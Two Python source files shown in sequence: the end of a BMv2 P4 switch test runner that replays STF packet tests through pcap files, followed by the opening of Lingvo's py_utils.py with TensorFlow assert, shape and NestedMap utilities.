for i in range(0, len(actions)):
actionName = actions[i]
actionId = action_ids[i]
self.actions[actionName] = actionId
def __str__(self):
return self.name
def makeKeyInstance(self):
return TableKeyInstance(self.key)
# Represents enough about the program executed to be
# able to invoke the BMV2 simulator, create a CLI file
# and test packets in pcap files.
class RunBMV2(object):
def __init__(self, folder, options, jsonfile):
self.clifile = folder + "/cli.txt"
self.jsonfile = jsonfile
self.stffile = None
self.folder = folder
self.pcapPrefix = "pcap"
self.interfaces = {}
self.expected = {} # for each interface number of packets expected
self.expectedAny = [] # interface on which any number of packets is fine
self.packetDelay = 0
self.options = options
self.json = None
self.tables = []
self.actions = []
self.switchLogFile = "switch.log" # .txt is added by BMv2
self.readJson()
self.cmd_line_args = getattr(options, 'switchOptions', ())
self.target_specific_cmd_line_args = getattr(options, 'switchTargetSpecificOptions', ())
def readJson(self):
with open(self.jsonfile) as jf:
self.json = json.load(jf)
for a in self.json["actions"]:
self.actions.append(BMV2Action(a))
for t in self.json["pipelines"][0]["tables"]:
self.tables.append(BMV2Table(t))
for t in self.json["pipelines"][1]["tables"]:
self.tables.append(BMV2Table(t))
def filename(self, interface, direction):
return self.folder + "/" + self.pcapPrefix + str(interface) + "_" + direction + ".pcap"
def interface_of_filename(self, f):
return int(os.path.basename(f).rstrip('.pcap').lstrip(self.pcapPrefix).rsplit('_', 1)[0])
def do_cli_command(self, cmd):
if self.options.verbose:
print(cmd)
self.cli_stdin.write(cmd + "\n")
self.cli_stdin.flush()
self.packetDelay = 1
def do_command(self, cmd):
if self.options.verbose:
print("STF Command:", cmd)
first, cmd = nextWord(cmd)
if first == "":
pass
elif first == "add":
self.do_cli_command(self.parse_table_add(cmd))
elif first == "setdefault":
self.do_cli_command(self.parse_table_set_default(cmd))
elif first == "mirroring_add":
# Pass through mirroring_add commands unchanged, with same
# arguments as expected by simple_switch_CLI
self.do_cli_command(first + " " + cmd)
elif first == "mc_mgrp_create" or first == "mc_node_create" or first == "mc_node_associate":
# Pass through multicast group commands unchanged, with
# same arguments as expected by simple_switch_CLI
self.do_cli_command(first + " " + cmd)
elif first == "packet":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
time.sleep(self.packetDelay)
try:
self.interfaces[interface]._write_packet(HexToByte(data))
except ValueError:
reportError("Invalid packet data", data)
return FAILURE
self.interfaces[interface].flush()
self.packetDelay = 0
elif first == "expect":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
if data != '':
self.expected.setdefault(interface, []).append(data)
else:
self.expectedAny.append(interface)
else:
if self.options.verbose:
print("ignoring stf command:", first, cmd)
def parse_table_set_default(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
actionName, cmd = nextWord(cmd, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = cmd.strip(")")
while cmd != "":
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
command = "table_set_default " + tableName + " " + actionName
if actionArgs.size():
command += " => " + str(actionArgs)
return command
def parse_table_add(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
key = table.makeKeyInstance()
actionArgs = None
actionName = None
prio, cmd = nextWord(cmd)
number = re.compile("[0-9]+")
if not number.match(prio):
# not a priority; push back
cmd = prio + " " + cmd
prio = ""
while cmd != "":
if actionName != None:
# parsing action arguments
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
else:
# parsing table key
word, cmd = nextWord(cmd)
if cmd.find("=") >= 0:
# This command retrieves a handle for the key
# This feature is currently not supported, so we just ignore the handle part
cmd = cmd.split("=")[0]
if word.find("(") >= 0:
# found action
actionName, arg = nextWord(word, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = arg + cmd
cmd = cmd.strip("()")
else:
k, v = nextWord(word, ":")
key.set(k, v)
if prio != "":
# Priorities in BMV2 seem to be reversed with respect to the stf file
# Hopefully 10000 is large enough
prio = str(10000 - int(prio))
command = "table_add " + table.name + " " + action.name + " " + str(key) + " => " + str(actionArgs)
if table.match_type == "ternary":
command += " " + prio
return command
def actionByName(self, table, actionName):
for name, id in table.actions.items():
action = self.actions[id]
if action.name == actionName:
return action
# Try again with suffixes
candidate = None
for name, id in table.actions.items():
action = self.actions[id]
if action.name.endswith(actionName):
if candidate is None:
candidate = action
else:
raise Exception("Ambiguous action name " + actionName + " in " + table.name)
if candidate is not None:
return candidate
raise Exception("No action", actionName, "in table", table)
def tableByName(self, tableName):
originalName = tableName
for t in self.tables:
if t.name == tableName:
return t
# If we can't find that try to match the tableName with a table suffix
candidate = None
for t in self.tables:
if t.name.endswith(tableName):
if candidate == None:
candidate = t
else:
raise Exception("Table name " + tableName + " is ambiguous between " +
candidate.name + " and " + t.name)
if candidate is not None:
return candidate
raise Exception("Could not find table " + tableName)
def interfaceArgs(self):
# return list of interface names suitable for bmv2
result = []
for interface in sorted(self.interfaces):
result.append("-i " + str(interface) + "@" + self.pcapPrefix + str(interface))
return result
def generate_model_inputs(self, stffile):
self.stffile = stffile
with open(stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
first, cmd = nextWord(line)
if first == "packet" or first == "expect":
interface, cmd = nextWord(cmd)
interface = int(interface)
if not interface in self.interfaces:
# Can't open the interfaces yet, as that would block
ifname = self.interfaces[interface] = self.filename(interface, "in")
os.mkfifo(ifname)
return SUCCESS
def check_switch_server_ready(self, proc, thriftPort):
"""While the process is running, we check if the Thrift server has been
started. If the Thrift server is ready, we assume that the switch was
started successfully. This is only reliable if the Thrift server is
started at the end of the init process"""
while True:
if proc.poll() is not None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex(("localhost", thriftPort))
if result == 0:
return True
def run(self):
if self.options.verbose:
print("Running model")
wait = 0 # Time to wait before model starts running
if self.options.usePsa:
switch = "psa_switch"
switch_cli = "psa_switch_CLI"
else:
switch = "simple_switch"
switch_cli = "simple_switch_CLI"
concurrent = ConcurrentInteger(os.getcwd(), 1000)
rand = concurrent.generate()
if rand is None:
reportError("Could not find a free port for Thrift")
return FAILURE
thriftPort = str(9090 + rand)
rv = SUCCESS
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
try:
runswitch = [FindExe("behavioral-model", switch),
"--log-file", self.switchLogFile, "--log-flush",
"--use-files", str(wait), "--thrift-port", thriftPort,
"--device-id", str(rand)] + self.interfaceArgs() + ["../" + self.jsonfile]
if self.cmd_line_args:
runswitch += self.cmd_line_args
if self.target_specific_cmd_line_args:
runswitch += ['--',] + self.target_specific_cmd_line_args
if self.options.verbose:
print("Running", " ".join(runswitch))
sw = subprocess.Popen(runswitch, cwd=self.folder)
def openInterface(ifname):
fp = self.interfaces[interface] = RawPcapWriter(ifname, linktype=0)
fp._write_header(None)
# Try to open input interfaces. Each time, we set a 2 second
# timeout. If the timeout expires we check if the bmv2 process is
# not running anymore. If it is, we check if we have exceeded the
# one minute timeout (exceeding this timeout is very unlikely and
# could mean the system is very slow for some reason). If one of the
# 2 conditions above is met, the test is considered a FAILURE.
start = time.time()
sw_timeout = 60
# open input interfaces
# DANGER -- it is critical that we open these fifos in the same
# order as bmv2, as otherwise we'll deadlock. Would be nice if we
# could open nonblocking.
for interface in sorted(self.interfaces):
ifname = self.interfaces[interface]
while True:
try:
signal.alarm(2)
openInterface(ifname)
signal.alarm(0)
except TimeoutException:
if time.time() - start > sw_timeout:
return FAILURE
if sw.poll() is not None:
return FAILURE
else:
break
# at this point we wait until the Thrift server is ready
# also useful if there are no interfaces
try:
signal.alarm(int(sw_timeout + start - time.time()))
self.check_switch_server_ready(sw, int(thriftPort))
signal.alarm(0)
except TimeoutException:
return FAILURE
time.sleep(0.1)
runcli = [FindExe("behavioral-model", switch_cli), "--thrift-port", thriftPort]
if self.options.verbose:
print("Running", " ".join(runcli))
try:
cli = subprocess.Popen(runcli, cwd=self.folder, stdin=subprocess.PIPE)
self.cli_stdin = cli.stdin
with open(self.stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
self.do_command(line)
cli.stdin.close()
for interface, fp in self.interfaces.iteritems():
fp.close()
# Give time to the model to execute
time.sleep(2)
cli.terminate()
sw.terminate()
sw.wait()
except Exception as e:
cli.terminate()
sw.terminate()
sw.wait()
raise e
# This only works on Unix: negative returncode is
# minus the signal number that killed the process.
if sw.returncode != 0 and sw.returncode != -15: # 15 is SIGTERM
reportError(switch, "died with return code", sw.returncode);
rv = FAILURE
elif self.options.verbose:
print(switch, "exit code", sw.returncode)
cli.wait()
if cli.returncode != 0 and cli.returncode != -15:
reportError("CLI process failed with exit code", cli.returncode)
rv = FAILURE
finally:
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
concurrent.release(rand)
if self.options.verbose:
print("Execution completed")
return rv
def comparePacket(self, expected, received):
received = ''.join(ByteToHex(str(received)).split()).upper()
expected = ''.join(expected.split()).upper()
if len(received) < len(expected):
reportError("Received packet too short", len(received), "vs", len(expected))
return FAILURE
for i in range(0, len(expected)):
if expected[i] == "*":
continue;
if expected[i] != received[i]:
reportError("Received packet ", received)
reportError("Packet different at position", i, ": expected", expected[i], ", received", received[i])
reportError("Full received packed is ", received)
return FAILURE
return SUCCESS
def showLog(self):
with open(self.folder + "/" + self.switchLogFile + ".txt") as a:
log = a.read()
print("Log file:")
print(log)
def checkOutputs(self):
if self.options.verbose:
print("Comparing outputs")
direction = "out"
for file in glob(self.filename('*', direction)):
interface = self.interface_of_filename(file)
if os.stat(file).st_size == 0:
packets = []
else:
try:
packets = rdpcap(file)
except:
reportError("Corrupt pcap file", file)
self.showLog()
return FAILURE
# Log packets.
if self.options.observationLog:
observationLog = open(self.options.observationLog, 'w')
for pkt in packets:
observationLog.write('%d %s\n' % (
interface,
''.join(ByteToHex(str(pkt)).split()).upper()))
observationLog.close()
# Check for expected packets.
if interface in self.expectedAny:
if interface in self.expected:
reportError("Interface " + interface + " has both expected with packets and without")
continue
if interface not in self.expected:
expected = []
else:
expected = self.expected[interface]
if len(expected) != len(packets):
reportError("Expected", len(expected), "packets on port", str(interface),
"got", len(packets))
self.showLog()
return FAILURE
for i in range(0, len(expected)):
cmp = self.comparePacket(expected[i], packets[i])
if cmp != SUCCESS:
reportError("Packet", i, "on port", str(interface), "differs")
return FAILURE
# remove successfully checked interfaces
if interface in self.expected:
del self.expected[interface]
if len(self.expected) != 0:
# didn't find all the expects we were expecting
reportError("Expected packects on ports", self.expected.keys(), "not received")
return FAILURE
else:
return SUCCESS
def run_model(options, tmpdir, jsonfile, testfile):
bmv2 = RunBMV2(tmpdir, options, jsonfile)
result = bmv2.generate_model_inputs(testfile)
if result != SUCCESS:
return result
result = bmv2.run()
if result != SUCCESS:
return result
result = bmv2.checkOutputs()
return result
######################### main
def usage(options):
print("usage:", options.binary, "[-v] [-p] [-observation-log <file>] <json file> <stf file>");
def main(argv):
options = Options()
options.binary = argv[0]
argv = argv[1:]
while len(argv) > 0 and argv[0][0] == '-':
if argv[0] == "-b":
options.preserveTmp = True
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-p":
options.usePsa = True
elif argv[0] == '-observation-log':
if len(argv) == 1:
reportError("Missing argument", argv[0])
usage(options)
sys.exit(1)
options.observationLog = argv[1]
argv = argv[1:]
else:
reportError("Unknown option ", argv[0])
usage(options)
argv = argv[1:]
if len(argv) < 2:
usage(options)
return FAILURE
if not os.path.isfile(argv[0]) or not os.path.isfile(argv[1]):
usage(options)
return FAILURE
tmpdir = tempfile.mkdtemp(dir=".")
result = run_model(options, tmpdir, argv[0], argv[1])
if options.preserveTmp:
print("preserving", tmpdir)
else:
shutil.rmtree(tmpdir)
if options.verbose:
if result == SUCCESS:
print("SUCCESS")
else:
print("FAILURE", result)
return result
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
py_utils.py
|
# Lint as: python2, python3
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as py_collections
import contextlib
import functools
import hashlib
import math
import numbers
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import hyperparams
from lingvo.core import ops
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import tshape
import numpy as np
import six
from six.moves import range
from six.moves import zip
from model_pruning.python import pruning
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import function
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool('enable_asserts', True,
'If False, we disable all asserts.')
tf.flags.DEFINE_bool('enable_check_numerics', True,
'If False, we bypass calls to CheckNumerics.')
tf.flags.DEFINE_bool('print_debug_tensors', False,
'Whether to print debug tensors.')
tf.flags.DEFINE_string(
'xla_device', '', 'If non-empty, can be cpu, gpu, or tpu (case sensitive)')
tf.flags.DEFINE_bool(
'use_resource_var', True,
'Use ResourceVariable instead of RefVariable; this option is '
'enabled by default and will be removed in the future.')
tf.flags.DEFINE_bool(
'tpu_compatible', False, 'Create variables in a way compatible with TPU. '
'This should be true for any job that will interact '
'with variables or a checkpoint that will be produced '
'or consumed by TPU')
tf.flags.DEFINE_bool(
'pin_vars_to_cpu', False,
'Pin variables to cpu:0. This is useful for weight-sharing / multi-core '
'inference on TPUs in which TPU core variables are managed via '
'TPUPartitionedCallOp.')
tf.flags.DEFINE_bool(
'no_identity_on_vars', False,
'Do not add tf.identity() on vars. This allows TPUPartitionedCallOp to use'
'variable handles directly for weight-sharing / multi-core '
'inference on TPUs.')
# NOTE: Using absl flags in libraries are frowned upon for several reasons:
#
# 1) They require app.run() or explicit flag parsing, preventing the use of
# these libraries in environments that don't look like normal binaries (colab
# notebooks).
#
# 2) They are process-level globals that cannot be scoped or configured except
# once during binary startup.
#
# Because py_utils is a library, no more flags should be used in this file; the
# existing flags are present for backwards compatibility. Instead, consider
# using a stack-scoped configuration object such as the Cluster object. We guard
# against issue 1 above by using _FromGlobal below, which uses the default value
# of the FLAG even if flags are unparsed.
FLAGS = tf.flags.FLAGS
def _FromGlobal(field_name):
"""Get 'field_name' from a global configuration object.
Currently the global configuration object used is FLAGS, but this may
change to Cluster() or an equivalent stack-scoped config object.
Args:
field_name: The string field name to look up.
Returns:
The value associated with the global configuration string 'field_name'.
"""
# TODO(b/145831327): check the field name in the current cluster object.
# If explicitly set, use that value instead of using the FLAG value.
# Now check the FLAGS object for backwards compatibility.
#
# If not explicitly set, get the field from the FLAGS object. If FLAGS
# have not been parsed yet, the default value of the flag will be used.
return FLAGS[field_name].value
ENQUEUE_OPS = '__lingvo_enqueue_ops'
TPU_EMBEDDING_LOAD_OPS = '__lingvo_tpu_embedding_load_ops'
TPU_EMBEDDING_RETRIEVE_OPS = '__lingvo_tpu_embedding_retrieve_ops'
TPU_EMBEDDING = '__tpu_embedding'
TPU_EMBEDDING_ACTIVATIONS = '__tpu_embedding_activations'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
def Assert(condition, data, *args, **kwargs):
if _FromGlobal('enable_asserts'):
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
return tf.group(
Assert(tf.reduce_all(tf.greater_equal(x, l)), [x], *args, **kwargs),
Assert(tf.reduce_all(tf.less(x, r)), [x], *args, **kwargs))
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x.name) + '_CheckNumerics'
return tf.check_numerics(x, message if message else x.name, *args, **kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not _FromGlobal('enable_check_numerics'):
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
yield
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.gfile.Open(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d did not exceed the expected value %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies(
[tf.assert_greater_equal(tf.rank(tensor), expected_rank)], tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor`
Raises:
A runtime error if the assertion fails.
"""
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
return with_dependencies([
ops.assert_shape_match(
tf.shape(tensor)[:ndims], expected_shape, msg=msg)
], tensor)
else:
return tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
def GetSize(tensor):
shape = GetShape(tensor)
if isinstance(shape, tf.Tensor):
return tf.size(tensor)
prod = 1
for d in shape:
prod = prod * d
return prod
def use_xla(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device')
if res:
assert res in ('', 'cpu', 'gpu', 'tpu')
return res
def use_tpu(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device') == 'tpu'
if res:
assert not _FromGlobal('enable_asserts') # asserts not supported on tpu
return res
def tpu_compat(): # pylint: disable=invalid-name
return use_tpu() or _FromGlobal('tpu_compatible')
def use_resource_variables(): # pylint: disable=invalid-name
return _FromGlobal('use_resource_var') or tpu_compat()
@contextlib.contextmanager
def outside_all_rewrites(): # pylint: disable=invalid-name
with tf.control_dependencies(None):
yield
class _ThreadLocalStack(threading.local):
def __init__(self):
super(_ThreadLocalStack, self).__init__()
self.stack = []
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
_tpu_device_assignment = None
def SetTpuDeviceAssignment(tpu_device_assignment):
global _tpu_device_assignment
if _tpu_device_assignment is not None:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment = tpu_device_assignment
# This function should called in unittest only.
def ClearTpuDevice():
global _tpu_device_assignment
_tpu_device_assignment = None
def GetTpuDeviceAssignment():
return _tpu_device_assignment
def SessionConfig(soft_placement=True, inline=True, cluster_def=None):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
Returns:
A TF session config proto.
"""
session_config = tf.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
_NAME_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*')
class NestedMap(dict):
"""A simple helper to maintain a dict.
It is a sub-class of dict with the following extensions/restrictions:
- It supports attr access to its members (see examples below).
- Member keys have to be valid identifiers.
E.g.::
>>> foo = NestedMap()
>>> foo['x'] = 10
>>> foo.y = 20
>>> assert foo.x * 2 == foo.y
"""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
# keys in this list are not allowed in a NestedMap.
_RESERVED_KEYS = set(dir(dict))
# sentinel value for deleting keys used in Filter.
_DELETE = object()
def __init__(self, *args, **kwargs):
super(NestedMap, self).__init__(*args, **kwargs)
for key in self.keys():
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s,'
' value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
def __setitem__(self, key, value):
# Make sure key is a valid expression and is not one of the reserved
# attributes.
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s, '
'value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
super(NestedMap, self).__setitem__(key, value)
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def __delattr__(self, name):
try:
del self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def copy(self): # Don't delegate w/ super: dict.copy() -> dict.
return NestedMap(self)
def __deepcopy__(self, unused_memo):
"""Deep-copies the structure but not the leaf objects."""
return self.DeepCopy()
def DeepCopy(self):
"""Deep-copies the structure but not the leaf objects."""
return self.Pack(self.Flatten())
@staticmethod
def FromNestedDict(x):
"""Converts every dict in nested structure 'x' to a NestedMap."""
if isinstance(x, dict):
res = NestedMap()
for k, v in six.iteritems(x):
res[k] = NestedMap.FromNestedDict(v)
return res
elif isinstance(x, (list, tuple)):
return type(x)(NestedMap.FromNestedDict(v) for v in x)
else:
return x
@staticmethod
def CheckKey(key):
"""Asserts that key is valid NestedMap key."""
assert isinstance(key, six.string_types) and _NAME_PATTERN.match(key), key
def GetItem(self, key):
"""Gets the value for the nested `key`.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
Returns:
The value for the given nested key.
Raises:
KeyError if a key is not present.
"""
current = self
# Note: This can't support lists. List keys are ambiguous as underscore is
# not reserved for list indexing but also allowed to be used in keys.
# E.g., this is a valid nested map where the key 'a_0' is not well defined
# {'a_0': 3, 'a': [4]}.
for k in key.split('.'):
current = current[k]
return current
def Get(self, key, default=None):
"""Gets the value for nested `key`, returns `default` if key does not exist.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
